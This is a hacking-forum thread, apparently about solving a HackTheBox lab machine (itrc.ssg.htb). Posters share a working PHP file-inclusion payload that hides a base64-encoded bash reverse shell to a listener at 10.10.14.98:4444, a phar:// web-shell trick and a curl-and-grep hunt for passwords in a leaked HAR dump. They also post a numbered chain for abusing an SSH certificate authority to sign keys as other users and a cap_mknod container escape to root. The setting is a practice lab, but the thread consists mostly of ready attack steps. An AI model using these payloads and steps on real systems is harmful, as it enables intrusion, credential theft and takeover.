Possibly Related Threads…

JonathanC0mradeJames · Aug 04, 2024, 05:52 PM

Well guys I have exceeded the DM limit on this platform so text me over discord for any queries Smile

Peace!

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reputation System Rules 5.1) You are not allowed to ask for, buy, sell, or trade reputation (You may ask after a deal is made, only exception)

4rrows · Aug 04, 2024, 06:46 PM

(Aug 04, 2024, 05:52 PM)JonathanC0mradeJames Wrote: Well guys I have exceeded the DM limit on this platform so text me over discord for any queries

Peace!

What's your handle on discord?? I searched jonathanc0mradejames but I can't find you

JonathanC0mradeJames · Aug 04, 2024, 06:48 PM

(Aug 04, 2024, 06:46 PM)4rrows Wrote:
(Aug 04, 2024, 05:52 PM)JonathanC0mradeJames Wrote: Well guys I have exceeded the DM limit on this platform so text me over discord for any queries

Peace!

What's your handle on discord?? I searched jonathanc0mradejames but I can't find you

jonathanc0mradejames

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Reputation System Rules 5.1) You are not allowed to ask for, buy, sell, or trade reputation (You may ask after a deal is made, only exception)

peRd1 · (This post was last modified: Aug 04, 2024, 06:52 PM by peRd1.)

(Aug 04, 2024, 06:18 PM)gihimlek Wrote:
(Aug 04, 2024, 04:38 PM)JonathanC0mradeJames Wrote: Step for root.

Do the following step as root in the container.

I would really appreciate if you guys give me reputation

Thanks, where did you found the good key?

Hehe, good.key. I guess it's gonna stick around being called like that forever. Haha. Rolleyes

Let me explain in a nutshell...

There are two paths to find out what is/which is, actually, the good.key - one way is intended and the other is unintended. Most of the people did the unintended.

Intended is regarding how to abuse the bash globbing on the command in the script where it is comparing the contents of your ca file with the specific ca-it file.
You can leak one char at a time the file. The script is broken but the vulnerability works. The script you should know which I'm talking about.. it's the one from /opt/
However, to do this you need zzinter user, and you need to find the correct principal to sign with the api. In order to logon with zzinter on the ssg host.

The unintended path is using docker abuse regarding cap_mknod - this step requires root on the docker container and proper user (e.g support) on the ssg host.
And you can search for files and leak out their content using a popular abuse technique to mount namespaces (google for that). There are bunch of private keys and
you need to work around trying or (brute forcing) to see which one will work to sign it with and logon as root.

That's about it, over and out, there is already SO MUCH content on this box spilled inside this thread.

andy1 · Aug 04, 2024, 09:39 PM

(Aug 04, 2024, 10:24 AM)mmkz Wrote:
(Aug 04, 2024, 10:06 AM)gigi_plus Wrote:
(Aug 04, 2024, 06:31 AM)glock05 Wrote:
(Aug 04, 2024, 06:28 AM)Lucifer097 Wrote:
(Aug 04, 2024, 06:14 AM)glock05 Wrote: help mine shell isn't rolled back

GET /index.php/?page=../../../../../../../../tmp/hello

listen with nc

visit /index.php/?page=../../../../../../../../tmp/hello

I still can't get the reverse shell. All i get is these warnings:

#PEAR_Config 0.9 a:13:{s:7:"php_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/php";s:8:"data_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/data";s:7:"www_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/www";s:7:"cfg_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cfg";s:7:"ext_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/ext";s:7:"doc_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/docs";s:8:"test_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/tests";s:9:"cache_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cache";s:12:"download_dir";s:123:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/download";s:8:"temp_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/temp";s:7:"bin_dir";s:114:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear";s:7:"man_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/man";s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}}

Try this...

$ curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip $ unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip $ grep -o -P '.{0,30}pass.{0,30}' itrc.ssg.htb.har "text": "user=msainristil&pass=...snipped...", $ ssh msainristil@10.10.11.27 password: ...snipped...

so how da fug did you find that "c2f4813259cc57fab36b311c5058cf031cb6eb51.zip" ?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation

metermike1338 · Aug 04, 2024, 09:40 PM

i somehow cant manage to go from zzinter and root on itrc to support on ssg. Can anyone hint tell me again how to do that? I think i am missing something.

andy1 · Aug 04, 2024, 09:48 PM

(Aug 04, 2024, 01:55 PM)osamy7593 Wrote: thinkphp is patched

ya seems the php reverse shell method described earlier in this thread does not work any longer.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation

andy1 · Aug 04, 2024, 10:25 PM

(Aug 04, 2024, 09:59 PM)spamdegratis5 Wrote:
(Aug 04, 2024, 09:48 PM)andy1 Wrote:
(Aug 04, 2024, 01:55 PM)osamy7593 Wrote: thinkphp is patched

ya seems the php reverse shell method described earlier in this thread does not work any longer.

This works too. You need to zip a php shell and then access the file using phar:// filter

http://itrc.ssg.htb/?page=phar://uploads/0dd174aa3b0eee562e627cc55bd394a917230298.zip/shell

(Aug 04, 2024, 09:39 PM)andy1 Wrote:
(Aug 04, 2024, 10:24 AM)mmkz Wrote:
(Aug 04, 2024, 10:06 AM)gigi_plus Wrote:
(Aug 04, 2024, 06:31 AM)glock05 Wrote: listen with nc

visit /index.php/?page=../../../../../../../../tmp/hello

I still can't get the reverse shell. All i get is these warnings:

#PEAR_Config 0.9 a:13:{s:7:"php_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/php";s:8:"data_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/data";s:7:"www_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/www";s:7:"cfg_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cfg";s:7:"ext_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/ext";s:7:"doc_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/docs";s:8:"test_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/tests";s:9:"cache_dir";s:120:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/cache";s:12:"download_dir";s:123:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/download";s:8:"temp_dir";s:119:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/temp";s:7:"bin_dir";s:114:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear";s:7:"man_dir";s:118:"/&/%3C?shell_exec(base64_decode(%22L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0Ljk4LzQ0NDQgMD4mMQ==%22));?%3E/pear/man";s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}}

Try this...

$ curl http://itrc.ssg.htb/uploads/c2f4813259cc57fab36b311c5058cf031cb6eb51.zip -o c2f4813259cc57fab36b311c5058cf031cb6eb51.zip $ unzip c2f4813259cc57fab36b311c5058cf031cb6eb51.zip $ grep -o -P '.{0,30}pass.{0,30}' itrc.ssg.htb.har "text": "user=msainristil&pass=...snipped...", $ ssh msainristil@10.10.11.27 password: ...snipped...

so how da fug did you find that "c2f4813259cc57fab36b311c5058cf031cb6eb51.zip" ?
Most likely he obtained in a late step, accessing the database.

(Aug 04, 2024, 09:40 PM)metermike1338 Wrote: i somehow cant manage to go from zzinter and root on itrc to support on ssg. Can anyone hint tell me again how to do that? I think i am missing something.
deRp1 already described the two ways to root this machine, and I've already posted the script to obtain the certificate, come on... at least do the effort.
https://book.hacktricks.xyz/linux-harden...#cap_mknod

small writeup
1. do the phar:// filter attack to obtain a foothold
2. [optional] search the database credentials and obtain the name of the zip file with the dump
3. with the filename obtained in the step 2 (or brute force), analyze the dump, the credentials for msainristil are there
4. with the ca private key in msainristil home folder, sign a keypair, using the principal zzinter (-n zzinter), claim your user flag
5. [optional] do the same as step 4 and create a keypair for principal root, you'll need it to exploit cap_mknod
6. use the script to sign a keypair for support principal
7. using the same curl request within the script in 6, sign a keypair for zzinter (you need to read the /etc/ssh files to obtain the correct principal for zzinter user)
8.1 you can choose here to do the indented way, just run the script I posted for globbing leak and obtain the certificate, sign a keypair for root and claim your flag
8.2 you can exploit cap_mknod here, using zzinter account in ssg (host) and itrc (container), you need to have access to root account in container to exploit it

How do you find the directory path to the zip and php shell after you upload it?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for reputation

redsmokefr · Aug 04, 2024, 10:55 PM

Hey guys.. I'm still a script kiddie so take it easy on me .. when I used gobuster to scan the domain I got /.hta and /.htaccess and ./htpasswd in the results is there a way I can steal those .. I think they contain ssh keys or something.

kettrex · Aug 04, 2024, 10:57 PM

I already have the root user, how did you manage to escape the Docker container to get the root flag?

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	602	92,016	Yesterday, 06:48 PM Last Post: sabero_exe
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,998	Yesterday, 09:54 AM Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	93,053	Yesterday, 08:48 AM Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,642	Yesterday, 05:08 AM Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,292	Apr 30, 2026, 02:10 PM Last Post: kkkato